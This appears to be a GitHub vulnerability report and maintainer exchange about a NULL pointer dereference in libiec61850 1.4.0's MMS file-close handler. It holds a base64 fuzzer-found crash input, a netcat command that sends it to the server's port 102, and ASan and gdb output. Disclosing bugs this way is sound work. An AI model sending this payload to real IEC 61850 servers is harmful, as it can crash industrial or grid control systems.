NULL Pointer Dereference was detected in the mmsServer_handleFileCloseRequest.c function of src/mms/iso_mms/server/mms_file_service.c.

[Alice-and-Bob]

Description

An NULL Pointer Dereference was detected in the mmsServer_handleFileCloseRequest.c function of src/mms/iso_mms/server/mms_file_service.c. The vulnerability manifests as SEGV and causes the application to crash

version

v1.4.0 and earlier release

system information

ubuntu18.04

proof of concept

poc

root@VirtualBox:/home/yang/AFL/out/crashes# base64 poc
AwAAQALwgAEAAQBhMzAxAgEAoCygKgICAImkAH9KAaEfoB0wG6AZoRcaC1RFTVBMQVRFTEQwGghT
UFZUMyRNWA==

command

cd path/to/libiec61850-v1.4.0/examples/server_example_substitution
sudo ./server_example_substitution

cat poc | nc 0.0.0.0 102

result

Using libIEC61850 version 1.4.0
Connection opened
ASAN:DEADLYSIGNAL
=================================================================
==3572==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x55555c32d37f bp 0x7f01d2ffc810 sp 0x7f01d2ffc7d0 T3)
==3572==The signal is caused by a READ memory access.
==3572==Hint: address points to the zero page.
    #0 0x55555c32d37e in mmsServer_handleFileCloseRequest src/mms/iso_mms/server/mms_file_service.c:860
    #1 0x55555c3306ce in handleConfirmedRequestPdu src/mms/iso_mms/server/mms_server_connection.c:242
    #2 0x55555c3326b4 in MmsServerConnection_parseMessage src/mms/iso_mms/server/mms_server_connection.c:655
    #3 0x55555c332838 in messageReceived src/mms/iso_mms/server/mms_server_connection.c:696
    #4 0x55555c386319 in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:307
    #5 0x55555c386faa in handleTcpConnection src/mms/iso_server/iso_connection.c:442
    #6 0x55555c31ed99 in destroyAutomaticThread hal/thread/linux/thread_linux.c:90
    #7 0x7f01d78696da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #8 0x7f01d71f461e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12161e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_mms/server/mms_file_service.c:860 in mmsServer_handleFileCloseRequest
Thread T3 created by T1 here:
    #0 0x7f01d7ab8d2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55555c31ee24 in Thread_start hal/thread/linux/thread_linux.c:101
    #2 0x55555c3876bb in IsoConnection_start src/mms/iso_server/iso_connection.c:532
    #3 0x55555c383f3e in handleIsoConnections src/mms/iso_server/iso_server.c:414
    #4 0x55555c384135 in isoServerThread src/mms/iso_server/iso_server.c:493
    #5 0x7f01d78696da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)

Thread T1 created by T0 here:
    #0 0x7f01d7ab8d2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x55555c31eec8 in Thread_start hal/thread/linux/thread_linux.c:105
    #2 0x55555c384708 in IsoServer_startListening src/mms/iso_server/iso_server.c:611
    #3 0x55555c328149 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:458
    #4 0x55555c31b730 in IedServer_start src/iec61850/server/impl/ied_server.c:612
    #5 0x55555c30636e in main /home/yang/iec61850/libiec61850-1.4.0-asan/examples/server_example_substitution/server_example_substitution.c:188
    #6 0x7f01d70f4c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)

==3572==ABORTING

gdb

GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from server_example_substitution...done.
(gdb) r
Starting program: /home/yang/iec61850/libiec61850-1.4.0-asan/examples/server_example_substitution/server_example_substitution 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using libIEC61850 version 1.4.0
[New Thread 0x7ffff32ff700 (LWP 4150)]
[New Thread 0x7ffff2afe700 (LWP 4151)]
Connection opened
[New Thread 0x7ffff22fd700 (LWP 4850)]

Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff22fd700 (LWP 4850)]
0x00005555555a837f in mmsServer_handleFileCloseRequest (connection=0x61100000ff40, buffer=0x63100001480d "\240*\002\002", bufPos=11, maxBufPos=12, invokeId=137, response=0x7ffff22fcb50) at src/mms/iso_mms/server/mms_file_service.c:860
860	    FileSystem_closeFile(frsm->fileHandle);
(gdb) print frsm->fileHandle
Cannot access memory at address 0x10
(gdb) 

[Alice-and-Bob]

hi，@mzillgith and teams. If you handle the error as soon as possible, I will provide all possible information

[mzillgith]

Hi,
I cannot reproduce this issue with a recent version of the library. So probably it has been fixed in the meantime.

[Alice-and-Bob]

This vulnerability exists in release 1.4.0 and earlier, so you may be using the wrong version of the code

[mzillgith]

Ok. So I don't know what to do about that. Version 1.4.0 is outdated and had various updates. And now it's no longer maintained.